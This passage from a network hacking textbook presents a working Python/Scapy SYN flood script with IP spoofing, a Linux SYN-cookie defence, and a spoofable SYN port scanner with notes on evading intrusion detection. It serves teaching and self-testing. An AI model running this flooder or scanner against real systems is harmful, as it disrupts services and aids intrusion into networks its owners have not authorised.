Log in / Register
Home arrow Computer Science arrow Understanding Network Hacks
< Prev   CONTENTS   Next >

5.7 SYN-Flooder

Another variant of DOS (Denial of Service) is SYN flooding. It overflows a target system with spoofed TCP packets, which have the SYN flag set, until it stops accepting new connections. Remember packets with a set SYN flag are used to initiate the three-way-handshake and are responded with a SYN/ACK packet on an open port. If the requesting side does not send the corresponding ACK the connection stays in the so called half-open state until a timeout occurs. In case too many connections are in half-open state the host wont accept any further connection.

Of course you want to know how your systems react on this exceptional state thus we program a simple SYN flooder with a few lines of Python code.

1 #!/usr/bin/python


3 import sys

4 from scapy.all import srflood, IP, TCP


6 if len(sys.argv) < 3:

7 print sys.argv[0] + " <spoofed_source_ip> <target>"

8 sys.exit(0)


10 packet = IP(src=sys.argv[1], dst=sys.argv[2]) /

11 TCP(dport=range(1,1024), flags="S")


13 srflood(packet, store=0)

Usually Syn flood attacks are combined with IP spoofing, otherwise the attacker may DOS himself or herself with the corresponding response packets. Furthermore the attacker could DOS another system by spoofing its IP and even raise the traffic, because the spoofed system will send back a RST packet for every SYN/ACK it receives.

Luckily nowadays SYN flooding attacks are not such a big deal anymore as they were a decade ago.

On Linux you can activate SYN cookies by executing the following:

echo 1 > /proc/sys/net/ipv4/tcp_syncookies

On BSDand Mac-OS-X systems similar mechanisms exist. For further information on SYN cookies please have a look at the tutorial from Daniel Bernstein under

5.8 Port-Scanning

For sure in a chapter about TCP/IP hacking there has to be a classical port scanner.

A port-scanner is a program that will just try to establish a connection port after port and afterwards list all the successful connections.

This technique is not only screamingly loud, because it tries to make a full threeway handshake for every port, but also slow. It would be far more elegant to just send a SYN packet to every port and see if we get a SYN/ACK (for open port) or a RST (closed port) or no (filtered port) response back. That's exactly the tool we are going to implement now!

1 #!/usr/bin/python


3 import sys

4 from scapy.all import sr, IP, TCP


6 if len(sys.argv) < 2:

7 print sys.argv[0] + " <host> <spoofed_source_ip>"

8 sys.exit(1)



11 # Send SYN Packets to all 1024 ports

12 if len(sys.argv) == 3:

13 packet = IP(dst=sys.argv[1], src=sys.argv[2])

14 else:

15 packet = IP(dst=sys.argv[1])


17 packet /= TCP(dport=range(1,1025), flags="S")


19 answered, unanswered = sr(packet, timeout=1)


21 res = {}


23 # Process unanswered packets

24 for packet in unanswered:

25 res[packet.dport] = "filtered"


27 # Process answered packets

28 for (send, recv) in answered:

29 # Got ICMP error message

30 if recv.getlayer("ICMP"):

31 type = recv.getlayer("ICMP").type

32 code = recv.getlayer("ICMP").code

33 # Port unreachable

34 if code == 3 and type == 3:

35 res[send.dport] = "closed"

36 else:

37 res[send.dport] = "Got ICMP with type " +

38 str(type) +

39 " and code " +

40 str(code)

41 else:

42 flags = recv.getlayer("TCP").sprintf("%flags%")


44 # Got SYN/ACK

45 if flags == "SA":

46 res[send.dport] = "open"


48 # Got RST

49 elif flags == "R" or

50 flags == "RA":

51 res[send.dport] = "closed"


53 # Got something else

54 else:

55 res[send.dport] = "Got packet with flags " +

56 str(flags)


58 # Print res

59 ports = res.keys()

60 ports.sort()


62 for port in ports:

63 if res[port] != "closed":

64 print str(port) + ": " + res[port]

The tool scans only the first 1024 ports since those are the privileged ports reserved for services such as SMTP, HTTP, FTP, SSH etc. If you like, you can of course adjust the code to scan all 65536 possible ports. Optionally, the program will accept an IP address to let the attack look like it came from a different source. To be able to evaluate the response packets it must still be possible for our host to receive the traffic of the spoofed IP.

The function range() is new in this source code. It returns a list of numbers from 1 to 1024. Also new is the function sr() that does not only send the packets on layer 3 but also reads the corresponding response packets. The list of response packets consists of tupels that include the packet that was send as first item and the response packet as second item.

We iterate over all response packets and check if it is either an ICMPor a TCP packet by applying the getlayer() method, which returns the header of the given protocol.

If the packet is an ICMP packet, we test the type and code that signals the type of the error. If it is a TCP packet, we examine the flags set to determine the meaning of the response. The flags are normally a long integer containing the possible flags as bit set or unset. This is not easy for us to handle therefore we convert the flags to a string with the help of the method lstinline|sprintf|. SA signals that the SYN and ACK flags are both set and therefore the port seems to be open. R or RA means the RST or RST and ACK flags are set and thus the port is closed otherwise we protocolize the flags set.

Besides SYN scanning, there are several other techniques to scan for open ports such as Null-, FIN-, and XMAS-Scans. They use packets where no flag, only the FIN flag or all flags are set. RFC conform systems will respond with a RST packet if the port is closed or not at all if it is open or filtered, but keep in mind modern network intrusion detection systems will send alerts on such scans.

Better trained attackers won't scan a target sequentially, but random ports on random hosts with a random timeout to avoid being detected Thus network intrusion detection systems keep an eye on the number of tried ports per destination host from a single source IP and if it gets too high they log it as port-scan and maybe even block the source IP for a given timespan. Try to scan your network and examine how your NIDS reacts. Also, try to scan with different flags set or write a program that will only scan some interesting ports in random order such as 21, 22, 25, 80 and 443.

The best documentation about port-scan techniques on the internet is of course written by Fyodor the inventor of the famous NMAP scanning-techniques.html, and you should definitely read it at least once.

Found a mistake? Please highlight the word and press Shift + Enter  
< Prev   CONTENTS   Next >
Business & Finance
Computer Science
Language & Literature
Political science